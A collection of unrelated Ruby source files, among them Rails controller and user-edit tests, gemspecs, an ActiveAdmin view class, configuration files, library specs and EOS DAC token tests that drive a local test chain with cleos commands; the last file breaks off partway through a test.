require 'test_helper'
class MicropostsControllerTest < ActionDispatch::IntegrationTest
def setup
@micropost = microposts(:orange)
end
test "should redirect create when not logged in" do
assert_no_difference 'Micropost.count' do
post microposts_path, params: { micropost: { content: "Lorem ipsum" } }
end
assert_redirected_to login_url
end
test "should redirect destroy when not logged in" do
assert_no_difference 'Micropost.count' do
delete micropost_path(@micropost)
end
assert_redirected_to login_url
end
test "should redirect destroy for wrong micropost" do
log_in_as(users(:bones))
micropost = microposts(:ants)
assert_no_difference 'Micropost.count' do
delete micropost_path(micropost)
end
assert_redirected_to root_url
end
end
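# For context, a minimal sketch of the controller filters these tests
# exercise, assuming the conventional Rails Tutorial setup (the actual
# MicropostsController is not part of this file):
#
#   class MicropostsController < ApplicationController
#     before_action :logged_in_user, only: [:create, :destroy]
#     before_action :correct_user,   only: :destroy
#   end
#
# An unauthenticated POST or DELETE is then redirected to login_url, and a
# DELETE against another user's micropost is redirected to root_url.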

# frozen_string_literal: true
lib = ::File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'proxy_pac_rb/version'
Gem::Specification.new do |spec|
spec.name = 'proxy_pac_rb'
spec.version = ProxyPacRb::VERSION
spec.authors = ['Dennis Günnewig']
spec.email = ['[email protected]']
spec.homepage = 'https://github.com/dg-vrnetze/proxy_pac_rb'
spec.summary = 'Compress, lint and parse proxy auto-config files from commandline, rack-compatible applications and custom ruby code.'
spec.description = <<-DESC
"proxy_pac_rb" is a gem to compress, lint and parse proxy auto-config files. It comes with a cli program, some rack middlewares and can be used from within ruby scripts as well. "proxy_pac_rb" uses a JavaScript runtime to evaulate a proxy auto-config file the same way a browser does to determine what proxy (if any at all) should a program use to connect to a server. You must install on of the supported JavaScript runtimes: therubyracer or therubyrhino
DESC
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| ::File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.add_runtime_dependency 'addressable', '~>2.3'
spec.add_runtime_dependency 'activesupport', '>=4.1', '<5.2'
spec.add_runtime_dependency 'uglifier', '>= 2.7.1'
spec.add_runtime_dependency 'excon', '~> 0.45.3'
spec.add_runtime_dependency 'contracts', '~> 0.9'
spec.add_runtime_dependency 'thor', '~> 0.19'
spec.required_ruby_version = '~> 2.3'
end
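# A quick, runnable illustration (not part of the gemspec itself) of how
# the pessimistic version constraints ('~>') declared above behave, using
# RubyGems' own Gem::Requirement API:
#
#   require 'rubygems'
#   req = Gem::Requirement.new('~> 2.3')
#   req.satisfied_by?(Gem::Version.new('2.9.1')) # => true  (>= 2.3, < 3.0)
#   req.satisfied_by?(Gem::Version.new('3.0.0')) # => false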

require 'spec_helper'
describe OboParser::Utilities::Viz do
let(:o) { parse_obo_file(
File.read(File.expand_path(File.join(File.dirname(__FILE__), '../../files/hao.obo')) )
) }
specify '#mock_coordinate_space' do
capture_stderr do
expect(OboParser::Utilities::Viz.mock_coordinate_space(o, size: 50, cutoff: 10)).to be_truthy
end
end
end

module ActiveAdmin
module Views
module Pages
class Base < Arbre::HTML::Document
def build(*args)
super
add_classes_to_body
build_active_admin_head
build_page
end
private
def add_classes_to_body
@body.add_class(params[:action])
@body.add_class(params[:controller].tr('/', '_'))
@body.add_class("active_admin")
@body.add_class("logged_in")
@body.add_class(active_admin_namespace.name.to_s + "_namespace")
end
def build_active_admin_head
within @head do
insert_tag Arbre::HTML::Title, [title, render_or_call_method_or_proc_on(self, active_admin_namespace.site_title)].compact.join(" | ")
active_admin_application.stylesheets.each do |style, options|
text_node stylesheet_link_tag(style, options).html_safe
end
active_admin_application.javascripts.each do |path|
text_node(javascript_include_tag(path))
end
if active_admin_namespace.favicon
text_node(favicon_link_tag(active_admin_namespace.favicon))
end
active_admin_namespace.meta_tags.each do |name, content|
text_node(tag(:meta, name: name, content: content))
end
text_node csrf_meta_tag
end
end
def build_page
within @body do
div id: "wrapper" do
build_unsupported_browser
build_header
build_title_bar
build_page_content
build_footer
end
end
end
def build_unsupported_browser
if active_admin_namespace.unsupported_browser_matcher =~ controller.request.user_agent
insert_tag view_factory.unsupported_browser
end
end
def build_header
insert_tag view_factory.header, active_admin_namespace, current_menu
end
def build_title_bar
insert_tag view_factory.title_bar, title, action_items_for_action
end
def build_page_content
build_flash_messages
div id: "active_admin_content", class: (skip_sidebar? ? "without_sidebar" : "with_sidebar") do
build_main_content_wrapper
build_sidebar unless skip_sidebar?
end
end
def build_flash_messages
div class: 'flashes' do
flash_messages.each do |type, message|
div message, class: "flash flash_#{type}"
end
end
end
def build_main_content_wrapper
div id: "main_content_wrapper" do
div id: "main_content" do
main_content
end
end
end
def main_content
I18n.t('active_admin.main_content', model: title).html_safe
end
def title
self.class.name
end
# Sets the page title for the layout to render
def set_page_title
set_ivar_on_view "@page_title", title
end
# Returns the sidebar sections to render for the current action
def sidebar_sections_for_action
if active_admin_config && active_admin_config.sidebar_sections?
active_admin_config.sidebar_sections_for(params[:action], self)
else
[]
end
end
def action_items_for_action
if active_admin_config && active_admin_config.action_items?
active_admin_config.action_items_for(params[:action], self)
else
[]
end
end
# Renders the sidebar
def build_sidebar
div id: "sidebar" do
sidebar_sections_for_action.collect do |section|
sidebar_section(section)
end
end
end
def skip_sidebar?
sidebar_sections_for_action.empty? || assigns[:skip_sidebar] == true
end
# Renders the content for the footer
def build_footer
insert_tag view_factory.footer
end
end
end
end
end
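# For context, a hypothetical sketch (not actual ActiveAdmin source) of how
# a concrete page might build on Base: subclasses typically override #title
# and #main_content, which Base renders via #build_main_content_wrapper above:
#
#   module ActiveAdmin
#     module Views
#       module Pages
#         class Dashboard < Base
#           def title
#             "Dashboard"
#           end
#
#           def main_content
#             para "Welcome to Active Admin"
#           end
#         end
#       end
#     end
#   end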

# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Mutations::Admin::Analytics::DevopsAdoption::Segments::Create do
include GraphqlHelpers
let_it_be(:admin) { create(:admin) }
let_it_be(:group) { create(:group, name: 'bbbb') }
let(:variables) { { namespace_id: group.to_gid.to_s } }
let(:mutation) do
graphql_mutation(:create_devops_adoption_segment, variables) do
<<-QL.strip_heredoc
clientMutationId
errors
segment {
id
namespace {
id
name
}
}
QL
end
end
def mutation_response
graphql_mutation_response(:create_devops_adoption_segment)
end
before do
stub_licensed_features(instance_level_devops_adoption: true)
end
it_behaves_like 'DevOps Adoption top level errors'
it 'creates the segment with the group' do
post_graphql_mutation(mutation, current_user: admin)
expect(mutation_response['errors']).to be_empty
segment = mutation_response['segment']
expect(segment['namespace']['name']).to eq('bbbb')
expect(::Analytics::DevopsAdoption::Segment.joins(:namespace).where(namespaces: { name: 'bbbb' }).count).to eq(1)
end
end

# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'sepa_king/version'
Gem::Specification.new do |s|
s.name = 'sepa_king'
s.version = SEPA::VERSION
s.authors = ['Georg Leciejewski', 'Georg Ledermann']
s.email = ['[email protected]', '[email protected]']
s.description = 'Implementation of pain.001.002.03 and pain.008.002.02 (ISO 20022)'
s.summary = 'Ruby gem for creating SEPA XML files'
s.homepage = 'http://github.com/salesking/sepa_king'
s.license = 'MIT'
s.files = `git ls-files`.split($/)
s.executables = s.files.grep(%r{^bin/}) { |f| File.basename(f) }
s.test_files = s.files.grep(%r{^(test|spec|features)/})
s.require_paths = ['lib']
s.required_ruby_version = '>= 1.9.3'
s.add_runtime_dependency 'activemodel'
s.add_runtime_dependency 'i18n'
s.add_runtime_dependency 'builder'
s.add_runtime_dependency 'iban-tools'
s.add_development_dependency 'bundler', '~> 1.3'
s.add_development_dependency 'rspec', '>=2.14'
s.add_development_dependency 'coveralls'
s.add_development_dependency 'simplecov'
s.add_development_dependency 'rake'
s.add_development_dependency 'nokogiri'
end

Spree::Admin::ProductsController.class_eval do
include SpreeSku::SkuGeneratorHelper
def new
@product = Spree::Product.new
@product.master.sku = generate_sku
end
end
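# A purely hypothetical sketch of what the included helper might provide;
# SpreeSku::SkuGeneratorHelper's real implementation is not shown in this
# file and may differ:
#
#   require 'securerandom'
#
#   module SpreeSku
#     module SkuGeneratorHelper
#       # e.g. derive a unique SKU from a random hex token
#       def generate_sku
#         SecureRandom.hex(6).upcase
#       end
#     end
#   end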

#
# Copyright 2011-2013, Dell
# Copyright 2013-2014, SUSE LINUX Products GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class RabbitmqService < PacemakerServiceObject
def initialize(thelogger)
super(thelogger)
@bc_name = "rabbitmq"
end
# Turn off multi proposal support till it really works and people ask for it.
def self.allow_multiple_proposals?
false
end
class << self
def role_constraints
{
"rabbitmq-server" => {
"unique" => false,
"count" => 1,
"exclude_platform" => {
"windows" => "/.*/"
},
"cluster" => true
}
}
end
end
def proposal_dependencies(role)
answer = []
answer
end
def create_proposal
@logger.debug("Rabbitmq create_proposal: entering")
base = super
@logger.debug("Rabbitmq create_proposal: done with base")
nodes = NodeObject.all
nodes.delete_if { |n| n.nil? }
nodes.delete_if { |n| n.admin? } if nodes.size > 1
controller = nodes.find { |n| n if n.intended_role == "controller" } || nodes.first
base["deployment"]["rabbitmq"]["elements"] = {
"rabbitmq-server" => [controller.name]
}
base["attributes"][@bc_name]["password"] = random_password
base["attributes"][@bc_name]["trove"]["password"] = random_password
@logger.debug("Rabbitmq create_proposal: exiting")
base
end
def apply_role_pre_chef_call(old_role, role, all_nodes)
@logger.debug("Rabbitmq apply_role_pre_chef_call: entering #{all_nodes.inspect}")
return if all_nodes.empty?
rabbitmq_elements, rabbitmq_nodes, rabbitmq_ha_enabled = role_expand_elements(role, "rabbitmq-server")
role.save if prepare_role_for_ha(role, ["rabbitmq", "ha", "enabled"], rabbitmq_ha_enabled)
net_svc = NetworkService.new @logger
# Allocate public IP if rabbitmq should listen on public interface
if role.default_attributes["rabbitmq"]["listen_public"]
rabbitmq_nodes.each do |n|
net_svc.allocate_ip "default", "public", "host", n
end
end
if rabbitmq_ha_enabled
unless rabbitmq_elements.length == 1 && PacemakerServiceObject.is_cluster?(rabbitmq_elements[0])
raise "Internal error: HA enabled, but element is not a cluster"
end
cluster = rabbitmq_elements[0]
rabbitmq_vhostname = "#{role.name.gsub("-config", "")}-#{PacemakerServiceObject.cluster_name(cluster)}.#{ChefObject.cloud_domain}".gsub("_", "-")
net_svc.allocate_virtual_ip "default", "admin", "host", rabbitmq_vhostname
if role.default_attributes["rabbitmq"]["listen_public"]
net_svc.allocate_virtual_ip "default", "public", "host", rabbitmq_vhostname
end
# rabbitmq, on start, needs to have the virtual hostname resolvable; so
# let's force a dns update now
ensure_dns_uptodate
end
@logger.debug("Rabbitmq apply_role_pre_chef_call: leaving")
end
def validate_proposal_after_save proposal
validate_one_for_role proposal, "rabbitmq-server"
attributes = proposal["attributes"][@bc_name]
# HA validation
servers = proposal["deployment"][@bc_name]["elements"]["rabbitmq-server"]
unless servers.nil? || servers.first.nil? || !is_cluster?(servers.first)
storage_mode = attributes["ha"]["storage"]["mode"]
validation_error("Unknown mode for HA storage: #{storage_mode}.") unless %w(shared drbd).include?(storage_mode)
if storage_mode == "shared"
validation_error("No device specified for shared storage.") if attributes["ha"]["storage"]["shared"]["device"].blank?
validation_error("No filesystem type specified for shared storage.") if attributes["ha"]["storage"]["shared"]["fstype"].blank?
elsif storage_mode == "drbd"
cluster = servers.first
role = available_clusters[cluster]
validation_error("DRBD is not enabled for cluster #{cluster_name(cluster)}.") unless role.default_attributes["pacemaker"]["drbd"]["enabled"]
validation_error("Invalid size for DRBD device.") if attributes["ha"]["storage"]["drbd"]["size"] <= 0
end
end
super
end
end

require 'mxx_ru/cpp'
MxxRu::Cpp::exe_target {
required_prj "so_5/prj.rb"
target "_unit.test.coop.user_resource"
cpp_source "main.cpp"
}

require_relative '../../spec_helper'
require_relative 'fixtures/classes'
require_relative 'shared/enumeratorized'
describe "Enumerable#each_slice" do
before :each do
@enum = EnumerableSpecs::Numerous.new(7,6,5,4,3,2,1)
@sliced = [[7,6,5],[4,3,2],[1]]
end
it "passes element groups to the block" do
acc = []
@enum.each_slice(3){|g| acc << g}.should be_nil
acc.should == @sliced
end
it "raises an ArgumentError if there is not a single parameter > 0" do
->{ @enum.each_slice(0){} }.should raise_error(ArgumentError)
->{ @enum.each_slice(-2){} }.should raise_error(ArgumentError)
->{ @enum.each_slice{} }.should raise_error(ArgumentError)
->{ @enum.each_slice(2,2){} }.should raise_error(ArgumentError)
->{ @enum.each_slice(0) }.should raise_error(ArgumentError)
->{ @enum.each_slice(-2) }.should raise_error(ArgumentError)
->{ @enum.each_slice }.should raise_error(ArgumentError)
->{ @enum.each_slice(2,2) }.should raise_error(ArgumentError)
end
it "tries to convert n to an Integer using #to_int" do
acc = []
@enum.each_slice(3.3){|g| acc << g}.should == nil
acc.should == @sliced
obj = mock('to_int')
obj.should_receive(:to_int).and_return(3)
@enum.each_slice(obj){|g| break g.length}.should == 3
end
it "works when n is >= full length" do
full = @enum.to_a
acc = []
@enum.each_slice(full.length){|g| acc << g}
acc.should == [full]
acc = []
@enum.each_slice(full.length+1){|g| acc << g}
acc.should == [full]
end
it "yields only as much as needed" do
cnt = EnumerableSpecs::EachCounter.new(1, 2, :stop, "I said stop!", :got_it)
cnt.each_slice(2) {|g| break 42 if g[0] == :stop }.should == 42
cnt.times_yielded.should == 4
end
it "returns an enumerator if no block" do
e = @enum.each_slice(3)
e.should be_an_instance_of(Enumerator)
e.to_a.should == @sliced
end
it "gathers whole arrays as elements when each yields multiple" do
multi = EnumerableSpecs::YieldsMulti.new
multi.each_slice(2).to_a.should == [[[1, 2], [3, 4, 5]], [[6, 7, 8, 9]]]
end
describe "when no block is given" do
it "returns an enumerator" do
e = @enum.each_slice(3)
e.should be_an_instance_of(Enumerator)
e.to_a.should == @sliced
end
# TODO: Need to investigate what 'Enumerable with size' means...
describe "Enumerable with size" do
describe "returned Enumerator" do
describe "size" do
xit "returns the ceil of Enumerable size divided by the argument value" do
enum = EnumerableSpecs::NumerousWithSize.new(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
enum.each_slice(10).size.should == 1
enum.each_slice(9).size.should == 2
enum.each_slice(3).size.should == 4
enum.each_slice(2).size.should == 5
enum.each_slice(1).size.should == 10
end
xit "returns 0 when the Enumerable is empty" do
enum = EnumerableSpecs::EmptyWithSize.new
enum.each_slice(10).size.should == 0
end
end
end
end
describe "Enumerable with no size" do
before :all do
@object = EnumerableSpecs::Numerous.new(1, 2, 3, 4)
@method = [:each_slice, 8]
end
# FIXME: something broken in our test runner
#it_should_behave_like :enumeratorized_with_unknown_size
end
end
end
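# For reference, the core behavior under test, runnable in plain Ruby:
#
#   (1..7).each_slice(3).to_a          # => [[1, 2, 3], [4, 5, 6], [7]]
#   (1..7).each_slice(3) { |g| p g }   # yields [1, 2, 3], [4, 5, 6], [7]; returns nil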

require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module ThankYou
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 6.0
config.time_zone = 'Tokyo'
config.i18n.default_locale = :ja
config.generators do |g|
g.test_framework :rspec, view_specs: false, routing_specs: false
end
config.middleware.use Rack::Attack
config.filter_parameters += %i[password]
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
config.i18n.enforce_available_locales = true
config.i18n.default_locale = :ja
end
end
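# The Rack::Attack middleware enabled above expects throttling/blocking
# rules to be defined elsewhere. A minimal sketch using Rack::Attack's
# documented throttle API (assumed to live in, e.g.,
# config/initializers/rack_attack.rb; not shown in this file):
#
#   Rack::Attack.throttle('requests by ip', limit: 300, period: 5.minutes) do |req|
#     req.ip
#   end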

# frozen_string_literal: true
Kaminari.configure do |config|
# config.default_per_page = 25
# config.max_per_page = nil
# config.window = 4
# config.outer_window = 0
# config.left = 0
# config.right = 0
# config.page_method_name = :page
# config.param_name = :page
# config.params_on_first_page = false
end
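# With every default left commented out above, Kaminari falls back to 25
# records per page. A minimal usage sketch (assuming a hypothetical
# ActiveRecord model named User):
#
#   User.page(params[:page])          # paginates with default_per_page (25)
#   User.page(params[:page]).per(50)  # overrides the per-page count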

=begin
#Xero Payroll UK
#This is the Xero Payroll API for orgs in the UK region.
The version of the OpenAPI document: 2.6.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.3.1
=end
require 'time'
require 'date'
module XeroRuby::PayrollUk
class StatutoryDeductionCategory
ADDITIONAL_STUDENT_LOAN = "AdditionalStudentLoan".freeze
CHILD_SUPPORT = "ChildSupport".freeze
COURT_FINES = "CourtFines".freeze
CREDITOR = "Creditor".freeze
FEDERAL_LEVY = "FederalLevy".freeze
INLAND_REVENUE_ARREARS = "InlandRevenueArrears".freeze
KIWI_SAVER = "KiwiSaver".freeze
MSD_REPAYMENTS = "MsdRepayments".freeze
NON_PRIORITY_ORDER = "NonPriorityOrder".freeze
PRIORITY_ORDER = "PriorityOrder".freeze
TABLE_BASED = "TableBased".freeze
STUDENT_LOAN = "StudentLoan".freeze
VOLUNTARY_STUDENT_LOAN = "VoluntaryStudentLoan".freeze
US_CHILD_SUPPORT = "USChildSupport".freeze
# Builds the enum from string
# @param [String] The enum value in the form of the string
# @return [String] The enum value
def self.build_from_hash(value)
new.build_from_hash(value)
end
# Builds the enum from string
# @param [String] The enum value in the form of the string
# @return [String] The enum value
def build_from_hash(value)
constantValues = StatutoryDeductionCategory.constants.select { |c| StatutoryDeductionCategory::const_get(c) == value }
raise "Invalid ENUM value #{value} for class #StatutoryDeductionCategory" if constantValues.empty?
value
end
end
end
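# A minimal usage sketch of the enum class above (illustrative only):
#
#   XeroRuby::PayrollUk::StatutoryDeductionCategory.build_from_hash('ChildSupport')
#   # => "ChildSupport"
#   XeroRuby::PayrollUk::StatutoryDeductionCategory.build_from_hash('Bogus')
#   # => raises RuntimeError: Invalid ENUM value Bogus for class #StatutoryDeductionCategory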

require 'test_helper'
class UsersEditTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
end
test "unsuccessful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
patch user_path(@user), params: { user: {
name: "", email: "foo@invalid",
password: "foo", password_confirmation: "bar"
}}
assert_template 'users/edit'
assert_select 'div.alert', text: "The form contains 4 errors."
end
test "successful edit with friendly forwarding" do
get edit_user_path(@user)
log_in_as(@user)
assert_redirected_to edit_user_url(@user)
assert_nil session[:forwarding_url]
patch user_path(@user), params: { user: {
name: "Foo Bar", email: "[email protected]",
password: "", password_confirmation: ""
}}
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal @user.name, "Foo Bar"
assert_equal @user.email, "[email protected]"
# assert_template 'users/#{@user.id}'
end
end
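# For context, the friendly forwarding exercised above is conventionally
# implemented with session-based helpers along these lines (a sketch of the
# standard Rails Tutorial approach; the actual SessionsHelper is not part
# of this file):
#
#   def redirect_back_or(default)
#     redirect_to(session[:forwarding_url] || default)
#     session.delete(:forwarding_url)
#   end
#
#   def store_location
#     session[:forwarding_url] = request.original_url if request.get?
#   end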

# frozen_string_literal: true
RSpec.shared_context 'token' do
let(:value) { 'token' }
let(:scope) { 'https://example.com/.default' }
let(:expire) { Time.now + 10 }
let(:token) { MSIDP::AccessToken.new(value, expire, scope) }
let(:attributes) { { value: value, scope: scope, expire: expire } }
end
RSpec.shared_context 'client_creds' do
include_context 'token'
let(:client_creds) { instance_double(ClientCreds, get_token: token) }
before do
allow(ClientCreds).to receive(:new).and_return(client_creds)
end
end
RSpec.shared_examples 'returning a token twice' do
subject { -> { AccessTokenProxy.token(scope) } }
it {
expect(subject.call).to have_attributes(attributes)
expect(subject.call).to have_attributes(attributes)
}
end
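# A minimal sketch of how a spec file might compose the shared pieces
# defined above (assuming AccessTokenProxy is the class under test):
#
#   RSpec.describe AccessTokenProxy do
#     include_context 'client_creds'
#     it_behaves_like 'returning a token twice'
#   end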

require 'spec_helper'
describe '#geopos' do
let(:key) { 'cities' }
context 'with existing key' do
let(:san_francisco) { [-122.5076404, 37.757815, 'SF'] }
let(:los_angeles) { [-118.6919259, 34.0207305, 'LA'] }
before { @redises.geoadd(key, *san_francisco, *los_angeles) }
after { @redises.zrem(key, %w[SF LA]) }
context 'with existing points only' do
let(:expected_result) do
[
%w[-122.5076410174369812 37.75781598995183685],
%w[-118.69192510843276978 34.020729570911179]
]
end
it 'returns decoded coordinates pairs for each point' do
coords = @redises.geopos(key, %w[SF LA])
expect(coords).to be == expected_result
end
context 'with non-existing points only' do
it 'returns array filled with nils' do
coords = @redises.geopos(key, %w[FF FA])
expect(coords).to be == [nil, nil]
end
end
context 'with both existing and non-existing points' do
let(:expected_result) do
[%w[-122.5076410174369812 37.75781598995183685], nil]
end
it 'returns mixture of nil and coordinates pair' do
coords = @redises.geopos(key, %w[SF FA])
expect(coords).to be == expected_result
end
end
end
end
context 'with non-existing key' do
before { @redises.del(key) }
it 'returns empty array' do
coords = @redises.geopos(key, %w[SF LA])
expect(coords).to be == [nil, nil]
end
end
end

require_relative '../../_test_helpers/CommonTestHelpers'
def configure_contracts_for_tests
run %(cleos system newaccount --stake-cpu "10.0000 EOS" --stake-net "10.0000 EOS" --transfer --buy-ram-kbytes 1024 eosio testuser1 #{CONTRACT_PUBLIC_KEY} #{CONTRACT_PUBLIC_KEY})
run %(cleos system newaccount --stake-cpu "10.0000 EOS" --stake-net "10.0000 EOS" --transfer --buy-ram-kbytes 1024 eosio testuser2 #{CONTRACT_PUBLIC_KEY} #{CONTRACT_PUBLIC_KEY})
run %(cleos system newaccount --stake-cpu "10.0000 EOS" --stake-net "10.0000 EOS" --transfer --buy-ram-kbytes 1024 eosio testuser3 #{CONTRACT_PUBLIC_KEY} #{CONTRACT_PUBLIC_KEY})
run %(cleos system newaccount --stake-cpu "10.0000 EOS" --stake-net "10.0000 EOS" --transfer --buy-ram-kbytes 1024 eosio otherdacacc #{CONTRACT_PUBLIC_KEY} #{CONTRACT_PUBLIC_KEY})
run %(cleos push action dacdirectory regdac '{"owner": "dacdirectory", "dac_name": "dacpropabp", "dac_symbol": "4,ABP", "title": "Dac Title", "refs": [[1,"some_ref"]], "accounts": [[2,"daccustodian"], [5,"dacescrow"], [7,"dacescrow"], [0, "dacauthority"], [4, "eosdactokens"], [1, "eosdacthedac"] ], "scopes": [] }' -p dacdirectory)
run %(cleos push action dacdirectory regdac '{"owner": "dacdirectory", "dac_name": "eosdac", "dac_symbol": "4,EOSDAC", "title": "EOSDAC BP", "refs": [[1,"some_ref"]], "accounts": [[2,"daccustodian"], [5,"dacescrow"], [7,"dacescrow"], [0, "dacauthority"], [4, "eosdactokens"], [1, "eosdacthedac"] ], "scopes": [] }' -p dacdirectory)
run %(cleos push action dacdirectory regdac '{"owner": "dacdirectory", "dac_name": "dacpropaby", "dac_symbol": "4,ABY", "title": "Dac Title", "refs": [[1,"some_ref"]], "accounts": [[2,"daccustodian"], [5,"dacescrow"], [7,"dacescrow"], [0, "dacauthority"], [4, "eosdactokens"], [1, "eosdacthedac"] ], "scopes": [] }' -p dacdirectory)
run %(cleos push action dacdirectory regdac '{"owner": "otherdacacc", "dac_name": "otherdac", "dac_symbol": "4,ABZ", "title": "Other Dac Title", "refs": [[1,"some_ref"]], "accounts": [[2,"daccustodian"], [5,"dacescrow"], [7,"dacescrow"], [0, "otherdacacc"], [4, "eosdactokens"], [1, "eosdacthedac"] ], "scopes": [] }' -p otherdacacc)
run %(cleos push action daccustodian updateconfige '{"newconfig": { "lockupasset": "10.0000 ABP", "maxvotes": 5, "periodlength": 604800 , "numelected": 12, "authaccount": "dacauthority", "tokenholder": "eosdacthedac", "serviceprovider": "dacocoiogmbh", "should_pay_via_service_provider": 1, "auththresh": 3, "initial_vote_quorum_percent": 15, "vote_quorum_percent": 10, "auth_threshold_high": 11, "auth_threshold_mid": 7, "auth_threshold_low": 3, "lockup_release_time_delay": 10, "requested_pay_max": "450.0000 EOS"}, "dac_id": "dacpropabp"}' -p dacauthority)
run %(cleos push action daccustodian updateconfige '{"newconfig": { "lockupasset": "10.0000 ABP", "maxvotes": 5, "periodlength": 604800 , "numelected": 12, "authaccount": "dacauthority", "tokenholder": "eosdacthedac", "serviceprovider": "dacocoiogmbh", "should_pay_via_service_provider": 1, "auththresh": 3, "initial_vote_quorum_percent": 15, "vote_quorum_percent": 10, "auth_threshold_high": 11, "auth_threshold_mid": 7, "auth_threshold_low": 3, "lockup_release_time_delay": 10, "requested_pay_max": "450.0000 EOS"}, "dac_id": "eosdac"}' -p dacauthority)
run %(cleos push action daccustodian updateconfige '{"newconfig": { "lockupasset": "10.0000 ABY", "maxvotes": 5, "periodlength": 604800 , "numelected": 12, "authaccount": "dacauthority", "tokenholder": "eosdacthedac", "serviceprovider": "dacocoiogmbh", "should_pay_via_service_provider": 1, "auththresh": 3, "initial_vote_quorum_percent": 15, "vote_quorum_percent": 10, "auth_threshold_high": 11, "auth_threshold_mid": 7, "auth_threshold_low": 3, "lockup_release_time_delay": 10, "requested_pay_max": "450.0000 EOS"}, "dac_id": "dacpropaby"}' -p dacauthority)
run %(cleos push action daccustodian updateconfige '{"newconfig": { "lockupasset": "10.0000 ABY", "maxvotes": 5, "periodlength": 604800 , "numelected": 12, "authaccount": "dacauthority", "tokenholder": "eosdacthedac", "serviceprovider": "dacocoiogmbh", "should_pay_via_service_provider": 1, "auththresh": 3, "initial_vote_quorum_percent": 15, "vote_quorum_percent": 10, "auth_threshold_high": 11, "auth_threshold_mid": 7, "auth_threshold_low": 3, "lockup_release_time_delay": 10, "requested_pay_max": "450.0000 EOS"}, "dac_id": "otherdac"}' -p otherdacacc)
run %(cleos set account permission daccustodian active '{"threshold": 1,"keys": [{"key": "#{CONTRACT_PUBLIC_KEY}","weight": 1}],"accounts": [{"permission":{"actor":"eosdactokens","permission":"eosio.code"},"weight":1}]}' owner -p daccustodian@owner)
end
describe "eosdactokens" do
before(:all) do
reset_chain
configure_wallet
seed_system_contracts
configure_dac_accounts_and_permissions
install_dac_contracts
configure_contracts_for_tests
end
after(:all) do
killchain
end
context "Create a new currency" do
it "without account auth should fail" do
result = wrap_command %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABY", "transfer_locked": false}')
expect(result.stderr).to include('Error 3040003')
end
# it "with mismatching auth should fail" do
# result = wrap_command %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABT", "transfer_locked": false}' -p eosio)
# expect(result.stderr).to include('Error 3090004')
# end
it "with matching issuer and account auth should succeed." do
result = wrap_command %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABY", "transfer_locked": false}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::create')
end
end
context "Locked Tokens - " do
context "Create with transfer_locked true" do
it "create new token should succeed" do
result = wrap_command %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABP", "transfer_locked": true}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::create')
end
context "Issue tokens with valid auth should succeed" do
it do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "1000.0000 ABP", "memo": "Initial amount of tokens for you."}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::issue')
end
end
end
context "Transfer with valid issuer auth from locked token should succeed" do
it do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosdactokens", "to": "eosio", "quantity": "500.0000 ABP", "memo": "my first transfer"}' --permission eosdactokens@active)
expect(result.stdout).to include('500.0000 ABP')
end
end
context "Transfer from locked token with non-issuer auth should fail" do
it do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "tester3", "to": "eosdactokens", "quantity": "400.0000 ABP", "memo": "my second transfer"}' -p tester3)
expect(result.stderr).to include('Ensure that you have the related private keys inside your wallet and your wallet is unlocked.')
end
end
context "Unlock locked token with non-issuer auth should fail" do
it do
result = wrap_command %(cleos push action eosdactokens unlock '{ "unlock": "10000.0000 ABP"}' -p tester3)
expect(result.stderr).to include('Ensure that you have the related private keys inside your wallet and your wallet is unlocked')
end
end
context "Transfer from locked token with non-issuer auth should fail after failed unlock attempt" do
it do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosio", "to": "eosdactokens", "quantity": "400.0000 ABP", "memo": "my second transfer"}' -p eosio)
expect(result.stderr).to include('Error 3090004')
end
end
context "Unlock locked token with issuer auth should succeed" do
it do
result = wrap_command %(cleos push action eosdactokens unlock '{ "unlock": "1.0 ABP"}' -p eosdactokens)
expect(result.stdout).to include('{"unlock":"1.0 ABP"}')
end
end
context "Transfer from unlocked token with non-issuer auth should succeed after successful unlock" do
it do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosio", "to": "eosdactokens", "quantity": "400.0000 ABP", "memo": "my second transfer"}' -p eosio)
expect(result.stdout).to include('400.0000 ABP')
end
end
context "Read the stats after issuing currency should display supply, supply and issuer" do
it do
result = wrap_command %(cleos get currency stats eosdactokens ABP)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"ABP": {
"supply": "1000.0000 ABP",
"max_supply": "10000.0000 ABP",
